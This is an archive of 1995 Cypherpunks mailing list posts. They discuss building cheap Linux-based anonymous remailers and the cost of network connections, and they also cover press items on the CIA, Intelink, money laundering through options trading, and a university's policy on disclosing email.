> or better into a Linux-based remailer site, complete with aliases, logging
> policies, etc. already configured for you. I bet even Tim May could install
> this if it were done right. :-)

Well, if I take the other side of the bet, that I *can't*, is that kosher?

> So, am I dreaming, or does this sound viable to y'all?

Sounds very good to me.

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jalicqui@prairienet.org (Jeff Licquia)
Date: Thu, 19 Jan 95 09:17:01 PST
To: cypherpunks@toad.com
Subject: Re: The Remailer Crisis
Message-ID: <9501191716.AA08891@firefly.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


>For example, the Linux mavens could tell us if Linux-based remailer
>boxes could be hung on dedicated connections to The Little Garden
>network, as a specific example. A "black box remailer" such as several
>folks have suggested (Chaum (in 1981), me, Eric Hughes, others) might be
>buildable for under a grand. We could ask here for contributions, and
>might even raise this amount of money. Then each of us who contributed
>could have "accounts," maybe several of them. Imagine 100 or more
>"remailers" all on this one machine--I'm deliberately ignoring the
>security issue for now. Little Garden has stated categorically that
>they will not tell users what they can or can't do with their machines
>(though I can think of some cases where they might have to, as with
>spamming, etc.). Anyway, you can see where I'm headed.

The "Linux mavens" followed by the "black box" stuff sparked an idea...

First, before delving into dreamland: I'm sure Linux could be hung off just
about any store-and-forward (a la UUCP) or TCP/IP-based network there is
with a minimum of trouble.

Linux junkies are familiar with the concept of "distributions".  For the
uninitiated, Linux itself is just a kernel; Linus Torvalds doesn't hold
anyone's hand when it comes to actually turning that kernel into a working
system.  As a result, people have done this job themselves: they build their
own working systems painstakingly from scratch and then archive it off to
disk or CD-ROM, which they sell or give away.  Most of the time, when you
get Linux, you're actually getting one of these "distributions" of Linux,
complete with all the frills that don't come with the kernel (like the
shell, basic utils, and so on).

Now how 'bout this: Consider a new distribution of Linux, the "Cypherpunk"
distribution (if ya don't like the name, make up yer own!).  This would be a
bare minimum of a distribution, with nothing fancy: bash, misc. utils like
ls, etc.  This can fit (tightly) in 20 MB.  The supplied kernel would have
every networking option under the sun turned on, but would be otherwise bare
of frills as well.  Now let's add minimal network utils (telnet and telnetd
for connecting and sendmail for obvious reasons), perl, PGP, and a remailer
package.  To make it as easy as possible, I'd use the UMSDOS filesystem, so
that Linux could be installed on a DOS machine without any reformatting,
repartitioning, or similar headaches.

We could make this available via FTP or press some CD-ROMs if we were
ambitious. Better yet, the cool Linux thing to do now is to install via NFS;
this makes installing Linux as easy as sticking in a boot disk and pointing
the install program at the NFS server (well, not quite, but pretty close).
After adding in the cute little install program (like the Slackware
distribution already has) and some boot options, you'd have an "instant
remailer" software package, able to transform any 386SX/4MB RAM DOS machine
or better into a Linux-based remailer site, complete with aliases, logging
policies, etc. already configured for you. I bet even Tim May could install
this if it were done right. :-)

So, am I dreaming, or does this sound viable to y'all?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Thu, 19 Jan 95 11:51:40 PST
To: cypherpunks@toad.com
Subject: "Time" Magazine and "Future Shock" Author
Message-ID: <199501191940.LAA09311@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



[I'm into my daily "blackout" of toad mail to Netcom, so am posting
blind, as usual. If this article has already been posted, my
condolences.]


The January 23rd issue of "Time," this week's issue, features a cover
story on talk shows, Limbaugh, Gingrich, and "HyperDemocracy." I
haven't seen the physical issue yet, but have skimmed the Web version
at:

http://www.timeinc.com/time/magazine/magazine.html

Point your browser at it and have fun.

Lots of folks are flaming the article, in the usual newsgroups (e.g.,
alt.data-highway). Me, I'm as scared as "Time" is about "direct,
electronic democracy," though perhaps for different reasons.

On a related note, the article and sidebars touch heavily on the
"cybergurus" who are advising Newt Gingrich on his journey into
cyberscpace, notably Alvin Toffler ("Future Shock," "The Third Wave,"
"Powershift," etc.) and George Gilder ("Beyond Wealth and Poverty,"
"Macrocosm," lots of essays on the Net).

As it happens, I spent some time talking to Alvin and Heidi Toffler at
an interview last Friday in L.A.--they were being interviewed before
and after me. Not enough time to really get into issues, and of course
they did most of the talking (Heidi is especially opinionated, and had
just been in a highly publicized battle with newage guru Arianne
Huffington, spacey wife of losing candiate in California, Michael H.).

Anyway, we talked about John Brunner (as you all know, Brunner's
seminal "The Shockwave Rider," was inspired by "Future Shock") and his
ideas. (And we all agreed that "Stand on Zanzibar" was his crowning
achievement...even Shalmaneser admitted "Christ, what an imagination
he's got.")

Tidbits:

* on digital cash: Heidi: "Oh, we're for it! Did you hear what I just
told the interviewer?" (I didn't, as I was in the adjacent room. Later
comments lead me to believe that neither of the Tofflers has a clear
idea of what's going to happen with digital cash and crypto anarchy.)

* on the NSA and the t-shirt I showed them ("Cypherpunks: putting the
NSA out of business"): "Oh, no, we need a strong NSA now more than
ever!"

(What else would I expect? They view the NSA as the main bastion
against terrorists plotting to blow up the World Trade Center. Alvin
was generally more reserved and thoughtful. When I pointed out that
the very hotel room we were in could be used to plot crimes, even
nuclear terrorism, and that the solution to stop this would have to be
an Orwellian regime of continuous monitoring, Alvin nodded
thoughtfully, but Heidi just sniffed. I mention this to give a flavor,
just a whiff, of what senior advisors to the most influential man in
America are thinking.)

* I gave Alvin a copy of my "Crypto Anarchy and Virtual Communities"
paper.

* My interview was pretty disappointing, by the way. Lots of sitting
around, delays in getting my laptop hooked up to Netcom (outside calls
had to be unblocked). The interviewer wanted memorable, quotable stuff
from me, but I felt constricted sitting around and being expected to
spout on cue. Maybe they'll get a few minutes of usable stuff....

(Print media is so much better. An interviewer can let the tape
recorder run for hours, can edit the containing material of a quote,
and can thus produce clear, coherent quotes. A video interview is more
constrained in lots of ways, and offending gestures or rambling
interjections cannot be easily edited out. As one example, at one
point I naturally (to me at least) said something about "As we just
saw...." Well, this made this quote unusable. And so it goes.)

I was generally unhappy with the whole thing. Four hours to get there,
two hours spend waiting around, an hour to resolve problems, an hour
under the camera lights (being told not to move, to "use the mouse,"
to "tell us why cryptography is important," etc.), and five hours to
get home. All for a few minutes at most on a t.v. show.

Oh, the show is the BBC's "Horizons" science series, which may also
get sold to U.S. outlets, etc. I think the title will be "The
Information Bomb," and features segments on information warfare, a la
Winn Schwartau's views, the Tofflers, some military planners,
and--maybe--me.

I don't have high hopes for my segment.

--Tim May

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.com (Peter Wayner)
Date: Thu, 19 Jan 95 08:39:36 PST
To: cypherpunks@toad.com
Subject: Anonyous Cash through Options Trading
Message-ID: <ab44451200021004c44d@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



Several months ago, there was a discussion at length about how one
could use the futures and options markets to transfer funds anonymously.
This week's edition of Forbes magazine (Jan 30, 95)
has the headline, "OIL! GUNS! GREED! Was Chase Manhattan ripped off by arms
traffickers?" In the story, Forbes guesses that some suspiciously large
losses in the options market could have been a smoke screen for money
laundering:

  Oil traders do big business in unlisted options, providing
  a further smoke screen. Perkins points to deals in which
  Harris would buy a put option on a cargo of crude from a
  friendly counterpart like Bayoil and resell a similar contract
  in the oil market. If oil prices climbed, the put would expire
  worthless and Bayoil would pocket the price of the option,
  while Arochem would break even. If oil prices dropped, and the
  ultimate buyer exercised the put, Arochem could absorb the
  loss while conveniently neglecting to exercise its put against
  Bayoil, Perkins theorizes. (pg 87)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rparratt@london.micrognosis.com (Richard Parratt)
Date: Thu, 19 Jan 95 03:51:53 PST
To: rparratt@london.micrognosis.com
Subject: Re: Internet, spamming, etc.
Message-ID: <9501191151.AA04857@pero>
MIME-Version: 1.0
Content-Type: text/plain


> > One could theoretically have a package that sprayed UDP packets
> > at a particular IP address, or even have a modified TCP
> > that ignored disconnects. I think most service providers
> > would regard using such code as being on a par with running
> > a program that tried to telnet sequentially to all known IP
> > addresses, trying common passwords on each.
> 
>   Code exists to do all of the things that you've mentioned.
> 
>   That was the original point of the discussion.

No doubt it does. But my assertion is that most service providers
would cut you off if you tried running such code, especially
the latter case.

--
Richard Parratt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arthur Chandler <arthurc@crl.com>
Date: Thu, 19 Jan 95 11:58:06 PST
To: cypherpunks@toad.com
Subject: "Disclosing" private email
Message-ID: <Pine.SUN.3.91.950119115343.15974B-100000@crl7.crl.com>
MIME-Version: 1.0
Content-Type: text/plain



  Greetings! I'd like to solicit your/our best thoughts on the following
message. San Francisco State University is considering a policy of
"disclosing" private email to outside agencies.  I'm aware that such a
policy is yet another argument for using crypto; and the last cypherpunks
meeting gave some encouraging instances of "transparent" encryption
schemes that are not a hassle or a fear-barrier for newbies. 
  But if you could post or private email me your thoughts about the 
legal/ethical aspects of "disclosure," I'd be much obliged.
  I've put a few of my own concerns at the end of the enclosed quote.


---------- Forwarded message ----------

>From: "Deirdre C. Donovan" <deirdre@mercury.sfsu.edu>
>
>I am rewriting the information handouts which we here in San Francisco
>give out to our students when they apply for Internet access accounts.
>The issue with which I am struggling is one of privacy.  I have heard of
>universities (anecdotally only) where the administration reserves the
>right to read E-mail.  Here, we are leaning more toward something like the
>paragraph below, which is taken verbatim from an Indiana University draft
>document.
>
>        IU computing centers will maintain the confidentiality of all
>        information stored on their computing resources.  Requests for
>        disclosure of confidential information will be reviewed by the
>        administrator of the computer system involved.  Such requests
>        will be honored only when approved by University officials
>        authorized by the [President] of the campus involved, or when
>        required by state or federal law.  Except when inappropriate,
>        computer users will receive prior notice of such disclosures.
>

   I'm uneasy about the chain of "prior notice":
  
   1) Does this policy give university administrators the power to read
private email before the decision is made to "disclose" it to outside
persons or agencies? 
 
   2) Does this "prior notice" mean "We're going to do it" or "We plan to do 
it, and if you disagree, let's discuss it before we release it"?
   
   3) What constitutes "inappropriate"?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Thu, 19 Jan 95 12:20:45 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: The Remailer Crisis
In-Reply-To: <199501191847.KAA28985@netcom15.netcom.com>
Message-ID: <199501191958.LAA13462@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



> Jeff's response is exactly what I was hoping for! The "Cypherpunks
> distribution" version of Linux would be a great way to spread cheap
> remailer technology on cheap Linux boxes. Hell, I might even augment
> my Macs with one of these things!

One thing I should've noted is that a Linux-based cheap remailer is
mostly useless without a "live connection" to the Net. That's why I
mentioned hanging these directly off The Little Garden's net (i.e.,
putting the box in the same building as the physical net, to avoid
expensive connections).

What are the cheapest "live connections" (24-hour a day connections)
available? Where I am, about $100 a month, plus whatever the local
phone company charges for a dedicated line. ISDN is an option, but it
looks to cost $400-800 to get started, plus a monthly charge (which I
don't recall, except that I "gulped" when I heard it).

So, even an el cheapo 486-based Linux box, for perhaps $800 or so,
would need to solve the problem of a cheap, continuous connection to
the Net. (My supposition is that one approach is to share these
connections, hence my notion of hanging machines on other people's
nets.)

At $100-200 per month for connect charges, I don't expect a "cheap
Linux distribution" will cause many people to set up remailers.

What have I overlooked?

Are there options for several machines to share a connection? (I'm
sure there are....). Someone who already has a connection may be
willing to host additional machines, which could share some of the
charges.

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 19 Jan 95 09:09:32 PST
To: cypherpunks@toad.com
Subject: WSJ on CIA Dump
Message-ID: <199501191708.MAA20858@pipe4.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


 
   The Wall Street Journal 
   January 18, 1995, p. A14. 
 
 
   Get Smart -- Eliminate the CIA 
 
 
   By Angelo Codevilla 
 
 
   Over the past several years, U.S. intelligence agencies in 
   general and the CIA in particular have proved themselves 
   incompetent in peacetime and of little use in conflict. 
   Stripped of their mystique and lacking the capacity to 
   reform themselves, these organizations are virtually in 
   receivership. 
 
 
   The maladies ailing the intelligence community are 
   numerous. Independent quality control was never more than 
   a pretense, and competition among intelligence agencies was 
   nonexistent. Producers of intelligence -- rather than the 
   soldiers and diplomats who have to use it -- have also 
   become its judges. All this has spawned a complex of 
   habits, procedures, mentalities and people too entrenched 
   to be repaired and too noxious for any part to form the 
   nucleus of a new, healthy system. Hence, we should take 
   Sen. Daniel Patrick Moynihan's advice, and rethink our 
   intelligence from the ground up. 
 
 
   A good place to start is with the fact that about half of 
   the $28 billion U.S. intelligence budget pays for units 
   directly controlled by military commanders, which routinely 
   provide precise information for the armed forces' 
   operations close to the front lines. The Treasury and State 
   Departments also have their own intelligence units, which 
   fit their needs quite well. So why do we need a national 
   system headed by the CIA? 
 
 
   The original justification for the creation of the CIA in 
   1947 was that intelligence would be best if its gathering 
   and evaluation were divorced as much as possible from the 
   operating departments of government -- State, Defense, etc. 
   -- and placed under the president. This judgment has turned 
   out to be wrong. Because presidents have relied on the CIA 
   to run the system, the result has been a system dominated 
   by the priorities of the producers -- not the users -- of 
   intelligence. 
 
 
   A basic failing is that the CIA has primary responsibility 
   for intelligence and none at all for real world events. The 
   CIA prefers to place its career employees in U.S. 
   embassies, where they pretend to be employees of other 
   parts of the government. Such "case officers" must 
   acknowledge that they are gathering information for the 
   U.S. Another disadvantage is that they don't speak foreign 
   languages well. 
 
 
   And unlike successful reporters, they virtually never know 
   the substantive fields about which they are seeking 
   information. Thus it is unsurprising that they are usually 
   outdone in economic reporting by economic reporters, in 
   military reporting by military reporters, and so forth. 
 
 
   The Aldrich Ames case shows how much more highly the CIA 
   values the smooth functioning of its system than what the 
   system produces. Mr. Ames handed the KGB the capacity to 
   shape the intelligence flowing to top U.S. officials during 
   the endgame of the Cold War. Thus disinformation made 
   presidents and secretaries of state more vulnerable to 
   Gorbomania than the average citizen informed by newspaper 
   accounts. 
 
 
   How could the CIA fail to notice the fishiness of reports 
   generated by a network controlled by the other side? The 
   same way that, in the 1970s and 1980s, the agency had 
   failed to notice that it was passing along reports from a 
   network of agents in Cuba totally controlled by Castro's 
   DGI, and from a network in East Germany all but a few of 
   whose agents were working for the Stasi. In other words, 
   while the Ames case was unusually destructive, it was a 
   typical example of bureaucratic sclerosis. 
 
 
   In the Gulf War, intelligence worsened the farther one got 
   away from the front lines. The national system headed by 
   the CIA misperceived the nature of Saddam Hussein's regime, 
   failed to grasp the obvious signs of attack, and has yet to 
   learn Saddam's military and political reasoning. Our 
   imaging satellites failed to find mobile Scud launchers, 
   and our communications intelligence antennas failed to shed 
   light on the diplomatic intercourse between Saddam and the 
   Soviets. National analysts misjudged Iraq's nuclear 
   program, and were fooled by elementary camouflage. Gen. H. 
   Norman Schwarzkopf's public belittling of CIA-run 
   intelligence was matched by unprintable epithets from field 
   commanders. 
 
 
   What happened in the Gulf would have happened in any 
   conflict because the intelligence community's cameras and 
   antennas were conceived, and its people trained, on the 
   CIA's assumption that cooperative competition with the 
   Soviet Union would last forever and that the basic designs 
   of weapons would not change. Thus cameras, for example, 
   were optimized to take pictures of fixed installations 
   rather than to keep track of attacking military forces or 
   mobile missile launchers. 
 
 
   Long before the Soviet collapse, however, it had become 
   clear that the CIA made bad bets. The age of mobile 
   missiles arrived long ago, and modern weapons are  defined 
   by the software they contain rather than by observable 
   features. So what's the point of, for example, analyzing a 
   radar signal that a computer can change in an instant? 
 
 
   Divorce from operational responsibility also tends to make 
   the reports that flow to top officials less valuable than 
   the information used to compile them. (In any given 
   subject, the CIA delivers a consensus of the system's 
   several agencies. It takes far more time for a paper to go 
   through the interagency process than for someone to write 
   the paper. Considering the elementary errors and ignorance 
   that often come out, it is clear that the conferees do not 
   spend much time fact-checking. Intelligence analysts become 
   spin doctors, concerned not with facts but with pushing 
   policy makers in the direction of their parent agencies' 
   prejudices. Hence the ultimate irony: A system whose 
   ostensible reason for being was to eliminate from 
   intelligence the parochial interests of tank drivers, 
   diplomats, bomber pilots, etc. ended up aggregating the 
   prejudices of the analysts -- prejudices unrelieved by the 
   sobering prospect of having to carry out the policies they 
   are pushing for. 
 
 
   The CIA has maintained a monopoly on judging the quality of 
   the system's operations and products. It does not heed 
   presidents, much less their appointees. A decade ago, the 
   agency ignored President Reagan's executive order to 
   reorganize counterintelligence. Two decades ago, President 
   Ford, shocked by how far intelligence estimates were 
   diverging from reality, asked a group of distinguished 
   outsiders (the B team) to see whether the intelligence 
   community's data on Soviet nuclear forces could support 
   conclusions different from those of the insider analysts. 
   The B Team, despite resistance from the agency, came up 
   with results far superior to the insider A Team's. 
 
 
   A better intelligence system should be built on a model 
   radically different from the 1947 original. Each of the 
   major departments of the U.S. government (State, Defense, 
   etc.) should be responsible for gathering and evaluating 
   the information it needs to operate in the new world 
   disorder. Intelligence, in short, should be franchised out 
   to its consumers. There is reason to believe that the 
   departments would do better without the ClA's tutelage than 
   with it. In the past, the armed forces have asked to deploy 
   officers who speak foreign languages, who could blend in 
   with the local population, and who would be experts in the 
   military fields on which they were reporting. U.S. military 
   leaders have also clamored for satellites whose products 
   they could use. Each time, the CIA made sure such requests 
   were denied. If those requests had been granted, the 
   country would be better informed. 
 
 
   In all this there is a need for some central coordination. 
   The several agencies have to mesh their quest for agents 
   abroad, lest they stumble over each other. The information 
   that any part of the government collects must be available 
   to properly cleared people in all other parts, so that any 
   and all analysis can be based on all the facts. 
   Fortunately, maintaining a central registry nowadays 
   requires computers, rather than the bureaucratic monster 
   that arose a half century ago. 
 
 
   Finally the president of the United States' own 
   intelligence needs should be provided by his own staff. 
   Among its duties should be to make sure that all the 
   agencies get each others' estimates. The availability to 
   the president and other top decision makers of contrasting 
   estimates from through out the government would stimulate 
   better performance all around. So, while there is a role 
   for a central intelligence agency in a system based on 
   consumer sovereignty, there is none for the CIA. 
 
 
   Mr. Codevilla, a fellow at the Hoover Institution, is the 
   author of "Informing Statecraft" (Free Press, 1992).  
 
 
   End 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 19 Jan 95 09:13:29 PST
To: cypherpunks@toad.com
Subject: BYTE on PGP WoT
Message-ID: <199501191712.MAA21219@pipe4.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


 
William Stallings writes in the BYTE February issue on "The PGP Web of
Trust."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@scruznet.com>
Date: Thu, 19 Jan 95 13:29:29 PST
To: "Timothy C. May" <tcmay@netcom.com>
Subject: Re: The Remailer Crisis
Message-ID: <Chameleon.4.01.950119132643.jcorgan@jcorgan.sj.scruznet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>What are the cheapest "live connections" (24-hour a day connections)
>available? Where I am, about $100 a month, plus whatever the local
>phone company charges for a dedicated line. ISDN is an option, but it
>looks to cost $400-800 to get started, plus a monthly charge (which I
>don't recall, except that I "gulped" when I heard it).

I am currently using ISDN from my home in San Jose.  You're right in 
that the startup costs are the barrier--even a cheap single B channel 
(56K) terminal adapter for use with a serial port will run $300-$400
dollars.  The telco charges are minimal in my area; $25 monthly for
the line itself (115 Kbps async bandwidth).  Connect charges are free 
for non peak usage, and $0.60/hour for peak usage time (0800 to 1700) 
Mon-Fri.

This is the Pacific Bell "Residential" ISDN plan.  For business lines,
it goes up to $50 monthly with $0.60/hour 24 hours a day.

In addition to this would apply any standard long distance charges that
would apply to a particular call.

This is an excellent setup for fast, cheap, INTERMITTENT connection to 
the Internet.  My particular ISP is in Santa Cruz, with POPS in SC, SJ,
and soon Monterey.  An unlimited connect time PPP account runs $75 monthly.
This actually gets me a three bit subnet so that I can put five IP boxes 
and an ISDN router on my ethernet at home.

A remailer in this scenario would need to have their MX record point to
their ISP, and process mail via POP (incoming) and SMTP (outgoing).  
It would be straightforward to implement a timed or demand dial scenario 
(say, every fifteen minutes) to accomplish this.  While not the ideal 
(continuous internet connection with pure SMTP based mail transport), it
would suffice for a moderately loaded remailer, I'd imagine.

Of course, this involves the mail subsystem of your ISP, partially
defeating the purpose of having ubiquitous anonymous remailer "instances"
whose operation is outside the control of an ISP.  Still, it would be
a good start.

==
Johnathan Corgan       "Violence is the last refuge of the incompetent."
jcorgan@scruznet.com                    -Isaac Asimov


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLx7Y2E1Diok8GKihAQExmwP8DmWuHMunZoaA4Y8qh7jx56hqgs4p3Bgo
DgHf2J4FoPwzVzXwSH0ep+1tKkHWNnDTXB7UVtuZjLF4uE4HtY72d0ANEfZ0AgPw
9peOBzZoukxpl6nMmHszUBWXxfP4DJW9AvbPdzOWFE1OAMIQLi6mpEyGE3Vouv61
WX+4gzx+4M0=
=iP7S
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: xpat@vm1.spcs.umn.edu
Date: Thu, 19 Jan 95 11:24:54 PST
To: cypherpunks@toad.com
Subject: Remailer-on-a-CD
Message-ID: <9501191924.AA17670@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>The "Linux mavens" followed by the "black box" stuff sparked an idea...

>package.  To make it as easy as possible, I'd use the UMSDOS filesystem so
>that Linux could be installed on a DOS machine without any reformatting
>repartitioning, or similar headaches.

>distribution already has) and some boot options, you'd have an "instant
>remailer" software package, able to transform any 386SX/4MB RAM DOS macine
>or better into a Linux-based remailer site, complete with aliases, loggng

>So, am I dreaming, or does this sound viable to y'all?

OK, let's ponder the minimum hardware necessary,
possible minimal configuration (Intel/clone based):

(1) Case.
(2) Power supply.
(3) Motherboard/CPU and 4mb RAM.
(4) Hard drive w/ controller.
(5) modem card.

(5) No monitor, keyboard, floppy, or video card.
   (a) would require some "umbilical cord" connection to initially
       set up from another PC.
   (b) need to operate on "umbilical", direct and uucp modes.

I am just thinking out loud here, but the hardware could be damn
cheap (sub $500). You can find old 386 boards with 4mb right on
the board (no SIMMs) for next to nothing (the decreasing popularity
of 30-pin SIMMs makes this a surplus store reality, as nobody
wants to bother to strip out the RAM chips anymore).

I have also seen an ad by the KILA company in Boulder, CO who
advertise some sort of compact pc-on-a-card deal, that might
be applicable.

Comments?

-------------------------------------------------------------------
P M Dierking |




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 19 Jan 95 11:14:28 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: (none)
In-Reply-To: <199501181607.IAA08201@largo.remailer.net>
Message-ID: <9501191913.AA04532@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric Hughes says:
> Why sendmail doesn't have anti-spam protection at this point is beyond
> me.  Denial of email service to one user should not deny service to
> all others.  I consider broken any email system that crashes a machine
> because of a disk partition filling.

As a mail administrator for many years, I've never seen a site crash
because of a filling disk partition due to mail overload. I've seen
Sendmail shut itself down temporarily, but thats to be expected. As
for the question of mail overload for one user harming the others, its
a design decision.  The only alternative is to produce quotas for mail
delivery, which at most of the places I run would be a very bad thing.
Strictly speaking, sendmail has nothing to do with local delivery and
isn't in a position to do any of this anyway -- but its easy enough to
change the local mailer (which is not part of sendmail) to do quotas
if you like.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 19 Jan 95 11:30:17 PST
To: cypherpunks@toad.com
Subject: Re: Cone of silence update
Message-ID: <9501191925.AA27121@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


---------- Begin Forwarded Message ----------
Date: Wed, 18 Jan 95 21:03:02 -0500
From: burton@het.brown.edu (Joshua W. Burton)
To: silent-tristero@world.std.com
Subject: Cone of silence update


I haven't been able to turn up the original New York Times article I saw,
but our own Providence (RI) Journal today reprinted an article from the
Washington Post, no date given, that tells substantially the same story,
though without any mention of the cost of Intelink.  Since a few people
have asked me for details, I thought I'd better post this verbatim.  Be
sure to save a copy, in case this article disappears the way the first
one I saw did....

GOVERNMENT'S SECRETS FLOW THROUGH AN INTERNET CLONE

WASHINGTON - When the US intelligence community recently decided to
modernize the way it communicates, it did what countless other 
government agencies, businesses and individuals have done over the
last few years:  it turned to the Internet.

But the regular Internet wouldn't do.  For spies and other government
officials concerned about secrecy, that very public, very uncontrollable
global mesh of computer networks was too risky a place to do business.

So the intelligence community created its own Internet.

Dubbed Intelink and based on the same technology used to run and
navigate the original Internet, this new network for sharing supersecret
information---including satellite imagery and video footage---officially
began operating just a few weeks ago.

When the bugs are worked out and a final system is in place, it will 
allow analysts, policy-makers, military officials and soldiers in the
field to tap quickly and directly into classified information at the
Central Intelligence Agency, the National Security Agency, the Pentagon
and diverse other parts of the national security bureaucracy.

Those familiar with Intelink say it could promote cooperation in a 
business characterized by internecine rivalry, and that at the very
least it will centralize and speed up information retrieval.

``This is a major breakthrough,'' said Barry Horton, principal deputy
assistant secretary of defense for command, control, communications
and intelligence.

``Intelink for the first time, in a user-friendly environment, allows
every element of the intelligence community and every element of the
Department of Defense to reach into every other element,'' he said.

As one might imagine, it's not for everybody.  Horton said the system
is now available only to people with ``Top Secret'' or higher security
clearances.

Moreover, those who run the system eventually will have to confront a
major issue of how to make Intelink flexible enough to accommodate
users with a variety of clearances.  There are many levels of 
classification higher than Top Secret, and for Intelink to be useful
to those working on the most secret programs, the officials 
responsible would have to be comfortable placing such information
on the system.

And, while Pentagon and CIA officials spoke of how Intelink promises
to improve communication and cooperation among the agencies and
reduce duplication of effort, others said there is good reason to
be skeptical.  The intelligence community has made innumerable
attempts to eliminate redundancy and streamline information channels,
but there has been little progress.

``It's gone like gangbusters since its inception, but any Internet-like
thing grows overnight.  The question is, is it going to mature well?
And how will it operate in a time of crisis?'' said Ross Stapleton-Gray,
who recently left the CIA to start a business providing Internet 
services to embassies in Washington.

In a way it is fitting that what some call an Internet ``clone'' should
come out of the national security bureaucracy.  Internet itself was
started under Department of Defense sponsorship in the 1960s, as an
attack-proof communications link among military, corporate and university
research centers.

``Remember, Internet is a DoD creation,'' said Neil Munro, a reporter
for Washington_Technology, a local business newspaper, who recently
broke the story about Intelink's start-up.  ``This is the prodigal
son....They created it and now it comes back in much stronger fashion.''

All those familiar with the system said it is totally walled off from
the Internet, and designed never to be penetrated.  But several
experts familiar with Intelink noted that no system is ever totally
secure.

``This would obviously be a Mount Everest for hackers,'' said John E.
Pike of the Federation of American Scientists.  But Pike, who said he
thinks Intelink has the potential to ``revolutionize'' the intelligence
community, added that it would be so difficult to crack he doubts
many will try.

The network now operates among several dozen intelligence agencies
and centers.  But it is the talk of the intelligence community, and
its reach is expected to grow rapidly.  Those who now have regular
access to it number in the hundreds, estimated Martin C. Faga,
general manager of the Center for Integrated Intelligence Systems
at the Mitre Corp., the company that helped the intelligence agencies
set up the system.
----------- End Forwarded Message -----------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "david d `zoo' zuhn" <zoo@armadillo.com>
Date: Thu, 19 Jan 95 12:58:27 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: The Remailer Crisis
Message-ID: <199501192056.OAA24035@monad.armadillo.com>
MIME-Version: 1.0
Content-Type: text/plain


//  Are there options for several machines to share a connection? (I'm
//  sure there are....). Someone who already has a connection may be
//  willing to host additional machines, which could share some of the
//  charges.

Around here (in the Twin Cities) one can get a dedicated connection for
$100/month without any startup fees.  And of course one can set up a local
network and use the machine with the modem link as a router.

Having one of these dedicated lines, I'd be happy to host remailer-boxes at
my site.  Ideally, they'll be small & only require a network cable and a
power cord.  

I'm also willing to seriously consider initiating remailer-accounts on my
machine.  If you'd be interested in a remailer account, drop me a line.


  -- 
  -  david d `zoo' zuhn  -| armadillo zoo software -- St. Paul, Minnesota
  --  zoo@armadillo.com --|   unix generalist (and occasional specialist)
  ------------------------+   http://www.armadillo.com/ for more information
    pgp key upon request  +----------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jalicqui@prairienet.org (Jeff Licquia)
Date: Thu, 19 Jan 95 13:05:11 PST
To: cypherpunks@toad.com
Subject: Re: Remailer-on-a-CD
Message-ID: <9501192105.AA29392@firefly.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


>>The "Linux mavens" followed by the "black box" stuff sparked an idea...
>
>>package.  To make it as easy as possible, I'd use the UMSDOS filesystem so
>>that Linux could be installed on a DOS machine without any reformatting
>>repartitioning, or similar headaches.
>
>>distribution already has) and some boot options, you'd have an "instant
>>remailer" software package, able to transform any 386SX/4MB RAM DOS macine
>>or better into a Linux-based remailer site, complete with aliases, loggng
>
